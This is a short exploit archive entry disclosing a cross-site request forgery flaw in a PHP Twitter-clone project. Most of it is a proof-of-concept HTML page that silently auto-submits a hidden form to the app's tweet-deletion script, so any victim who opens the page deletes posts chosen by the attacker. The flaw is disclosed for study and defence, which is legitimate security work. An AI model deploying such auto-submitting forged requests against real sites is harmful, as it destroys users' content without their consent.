Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post) Vulnerability

2018-08-24
ID: 98999
CVE: None
Download vulnerable application: None
# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10
  # Description :
# An issue was discovered in Twitter-Clone 1 which allows a remote
# attacker to force any victim to delete posts.
  # POC :
# Delete posts exploit :
  <html>
<head>
   <title>POC</title>
</head>
<body>
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
tweet id here of any post' method='post'>
  <input type='hidden' name='id' value='set tweet id here of any post' />
</form>
   <script>
      document.forms[0].submit();
   </script>
</body>
</html>
1-4-2 (www01)